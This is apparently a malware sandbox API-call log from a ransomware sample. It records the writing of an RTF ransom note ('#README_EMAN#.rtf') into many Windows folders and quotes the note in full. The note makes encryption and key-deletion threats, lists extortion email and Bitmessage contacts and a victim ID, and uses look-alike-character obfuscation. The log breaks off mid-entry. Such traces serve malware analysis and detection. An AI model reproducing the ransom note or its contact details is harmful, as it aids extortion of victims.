{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.783] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.783] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.783] CloseHandle (hObject=0x284) returned 1 [0269.783] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\javapath\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\oracle\\java\\javapath\\#readme_eman#.rtf")) returned 0x20 [0269.783] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\oracle\\java\\javapath_target_5923062\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0x20 [0269.784] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0x20 [0269.785] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#readme_eman#.rtf")) returned 0x20 [0269.785] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0x20 [0269.785] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\#readme_eman#.rtf")) returned 0x20 [0269.785] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\usoshared\\logs\\#readme_eman#.rtf")) returned 0x20 [0269.785] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\#README_EMAN#.rtf" (normalized: 